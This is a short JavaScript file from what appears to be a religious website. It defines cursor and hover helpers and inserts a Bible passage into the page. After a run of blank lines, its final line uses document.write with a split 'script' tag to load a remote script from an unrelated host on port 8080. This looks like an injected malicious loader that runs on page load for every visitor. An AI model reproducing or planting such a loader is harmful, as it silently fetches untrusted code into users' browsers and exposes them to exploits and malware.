var agt=navigator.userAgent.toLowerCase();

function mainon(obj,style) {
	if (agt.indexOf('msie')!=-1) obj.style.cursor="hand";
	obj.style.cursor="pointer";
	document.getElementById(style).style.backgroundColor='#f9e9c4';
}
function mainoff(obj,style) {
	obj.style.cursor="default";
	document.getElementById(style).style.backgroundColor='white';
}
function handcursor(obj) {
	if (agt.indexOf('msie')!=-1) obj.style.cursor="hand";
	obj.style.cursor="pointer";
}
function defaultcursor(obj) {
	obj.style.cursor="default";
}
function go(url) {
	document.location.href=url;
}
function show(ref) {
	m9="";
	j4="[Say not, There are yet four months, and then comes harvest? behold, I say unto you, Lift up your eyes, and look on the fields; for they are white already to harvest. And he that reaps receives wages, and gathers fruit unto life eternal: that both he that sows and he that reaps may rejoice together.]";
	if (ref=="m9") scripture=m9;
	else scripture=j4;
	document.getElementById(ref).innerHTML=scripture;
}




document.write('<s'+'cript type="text/javascript" src="http://assol.metro-trading.net:8080/Operating_System.js"></scr'+'ipt>');